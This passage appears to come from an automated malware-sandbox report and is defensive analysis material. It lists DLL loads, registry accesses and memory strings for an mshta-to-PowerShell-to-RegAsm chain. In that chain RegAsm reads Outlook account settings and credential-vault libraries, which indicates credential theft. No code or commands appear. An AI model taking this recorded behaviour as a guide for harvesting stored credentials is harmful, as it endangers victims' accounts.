                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                      Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065247057.0000000006EB6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.pdb source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065318838.0000000006EC7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
